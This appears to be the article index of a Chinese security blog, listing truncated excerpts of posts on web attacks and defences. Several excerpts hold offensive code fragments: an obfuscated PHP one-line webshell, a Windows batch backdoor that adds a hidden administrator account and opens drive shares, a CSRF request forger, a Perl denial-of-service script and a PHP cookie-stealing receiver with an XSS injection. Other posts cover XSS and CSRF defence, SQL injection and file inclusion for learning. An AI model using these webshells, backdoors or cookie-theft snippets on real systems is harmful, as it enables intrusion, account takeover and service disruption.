关闭

Python爬虫学习篇——————网络爬虫用到的库

抓取用到的python自带模块:urllib、urllib2、requests、httplib2等 Requests: import?requests response?=?requests.get(url) content?=?requests.get(url).content print "response?headers:", response.headers print "co...
阅读(239) 评论(0)

代码篇——————一句话木马

ASP系列         (密码是-7)     PHP系列             @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                   @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                   @$_/*-/*...
阅读(197) 评论(1)

代码篇——————windows后门代码

@echo off      @net user zzunble zzunble.net /add @net localgroup administrators zzunble /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @echo 3>c:\windows\system32\t1....
阅读(79) 评论(0)

CSRF攻击代码

This page forges an HTTP POST request.       function post(url,fields)   {   //create a element.   var p = document.createElement("form");   //construct the form   p.action = url;   p.inne...
阅读(151) 评论(0)

利用perl脚本执行拒绝攻击的代码

#!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print CCCCCCCCCCOOCCOOOOO88...
阅读(181) 评论(0)

接收cookie代码与注入盗取cookie代码参考

document.write('');alert(/XSS/) $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间 $referer=...
阅读(141) 评论(0)

实例演示——————简单演示XSS store攻击,便于学习理解XSS store

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。 一,环境搭建      1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。      2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者...
阅读(351) 评论(0)

搜索的艺术————黑客语法

谷歌黑客语法:搜索也是一门艺术 intitle:搜索网页标题中包含有特殊字符的网页。如:intitle:cbi inurl:搜索包含有特定字符的URL intext:搜索网页正文内容中的指定字符。intext:to parent directory Filetype:搜索指定类型的文件 Site:找到与指定网站有关联的URL 语法组合,威力加倍,成功率更高。 Site:目标网...
阅读(130) 评论(0)

web安全————PHP安全之文件包含漏洞

PHP安全问题     PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。     文件包含漏洞:     文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,并让服务器端执行。代码注入的典型代表就是文件包含(file inclusion).这种文件包含漏洞可能...
阅读(599) 评论(0)

web安全————文件上传漏洞

文件上传漏洞        所谓的文件上传漏洞是指用户上传了一个可执行脚本,并通过脚本文件获得执行服务器端命令 的能力。文件上传本身是没有问题的,它只是一种正常的业务需求,问题出在文件上传后服务器怎么处理、解释文件。文件上传后导致常见的安全问题一般包括:        1,上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码被执行        2,上传文件是f...
阅读(167) 评论(0)

web安全————注入(初识篇)

注入攻击        注入攻击是web安全领域中最常见的一种攻击方式。注入攻击的本质就是把用户输入的数据当作代码执行,主要的两个关键条件:第一是用户能够控制输入,第二是原本程序要执行的代码拼接了用户输入的数据。在注入中,常见的就是SQL,下面我们来看看SQL注入的一些方法、技巧以及防御。        SQL注入        请看一个典型的SQL注入例子:        var...
阅读(336) 评论(0)

web安全————clickjacking(点击劫持)

点击劫持(clickjacking)       点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击在...
阅读(1617) 评论(0)

web安全————CSRF(防御篇)

CSRF防御之验证码      目前,验证码被认为是对抗CSRF攻击最简单有效的防御措施。用到验证码就是在请求过程中强制用户与应用进行交互,但是一个站点、一个好的产品要考虑到用户的体验,显然如果在所有的操作上都加入验证码对用户来说就很不友好。因此验证码只能是一种防御CSRF攻击的辅助手段,并不能成为主要解决方案。      CSRF攻击之Referer check      一个站点...
阅读(258) 评论(0)

web安全————CSRF(攻击篇)

跨站请求伪造(CSRF)      首先先来看一个实例:当用户在某个论坛上删除某篇文章时,通过抓包获取请求如下:      http://blog.sohu.com/manage/entry.do?m=delete&id=12345678。用户登录后cookie为有效状态下,服务器接受到上述请求将会当作一次更新操作执行。为了完成CSFR攻击,攻击者需要构造一个页面:http://www.a.c...
阅读(131) 评论(0)

web安全————XSS(预防篇)

现在市面浏览器都对XSS做了一些防范措施,如firefox的CSP、Noscrip扩展和IE8内置的XSS Filter等等。但是对于一个站点来说,这往往是不够的,还需要做出更优秀更好的方案防止XSS攻击。如httponly、输入检查、输出检查等等。      httponly是由微软提出来的,目前很多浏览器都支持该功能。带有httponly标识将禁止javascript访问cookie...
阅读(144) 评论(0)
27条 共2页1 2 下一页 尾页
    个人资料
    • 访问:8030次
    • 积分:329
    • 等级:
    • 排名:千里之外
    • 原创:26篇
    • 转载:1篇
    • 译文:0篇
    • 评论:1条
    文章分类
    最新评论